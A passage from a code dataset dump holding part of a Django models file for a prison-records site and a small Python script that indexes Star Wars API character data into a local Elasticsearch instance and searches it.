    #         total_mistreatments=Count('treatment'))['total_mistreatments']\n\n    #     self.save()\n\n    @classmethod\n    def prefetch_queryset(cls, queryset):\n        \"\"\"\n        Update a queryset to prefetch all related data for a prison.\n        \"\"\"\n        return (queryset\n                .prefetch_related('facilitylinks')\n                .prefetch_related('facilities')\n                .prefetch_related('files')\n                .prefetch_related('quotes')\n                .prefetch_related('sources')\n                .prefetch_related('timeline')\n                .prefetch_related('comments'))\n\n\nclass PrisonComment(core_types.models.Comment):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='comments')\n\n\nclass PrisonSource(core_types.models.Source):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='sources')\n\n    class Meta:\n        unique_together = [\n            ('prison', 'name'),\n        ]\n\n\nclass PrisonQuote(core_types.models.Quote):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='quotes')\n\n\nclass PrisonFile(core_types.models.File):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='files')\n\n    FILE_TYPE_CHOICES = [\n        ('visual_records', _('Visual records')),\n        ('mistreatments', _('Mistreatments')),\n        ('testimonials', _('Testimonials')),\n        ('campaigns', _('Campaigns')),\n    ]\n\n    file_type = models.CharField(\n        choices=FILE_TYPE_CHOICES,\n        max_length=16,\n    )\n\n\nclass PrisonTimeline(core_types.models.Timeline):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='timeline')\n\n\nclass PrisonFacility(core_types.models.Choice):\n    class Meta:\n        verbose_name = _('Prison Facility')\n\n\nclass PrisonFacilityLink(core_types.models.PublishableMixin, models.Model):\n    prison = models.ForeignKey(\n        'Prison',\n        related_name='facilitylinks')\n    facility = models.ForeignKey(\n        'PrisonFacility')\n    description = models.CharField(max_length=255, null=True, blank=True)\n","repo_name":"u4i-admin2/IPA","sub_path":"prisons/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"71925111859","text":"\"\"\"\n@Project : text-classification-cnn-rnn\n@Module : es_index.py\n@Author : Deco [deco@cubee.com]\n@Created : 5/30/18 11:56 AM\n@Desc : \n\"\"\"\n# make sure ES is up and running\nimport requests\nres = requests.get('http://localhost:9200')\nprint(res.content)\n\n# connect to our cluster\nfrom elasticsearch import Elasticsearch\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n# let's iterate over swapi people documents and index them\nimport json\n\ni = 1\nr = requests.get('http://swapi.co/api/people/' + str(i))\nwhile r.status_code == 200:\n    # check the status before indexing, so the final 404 body never\n    # ends up in the index\n    es.index(index='sw', doc_type='people', id=i, body=json.loads(r.content))\n    i = i + 1\n    r = requests.get('http://swapi.co/api/people/' + str(i))\n\nprint(i)\n\n\nes.search(index=\"sw\", body={\"query\": {\"match\": {'name': 'Darth Vader'}}})\n","repo_name":"arfu2016/nlp","sub_path":"nlp_models/elasticSearch/es_index.py","file_name":"es_index.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
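A sketch of reading the hits back out of the search call that closes the record above; the field paths follow the standard Elasticsearch response shape for this 5.x-era client:

res = es.search(index="sw", body={"query": {"match": {"name": "Darth Vader"}}})
print("%d documents found" % res["hits"]["total"])
for doc in res["hits"]["hits"]:
    # _source carries the original swapi document that was indexed
    print(doc["_id"], doc["_source"]["name"])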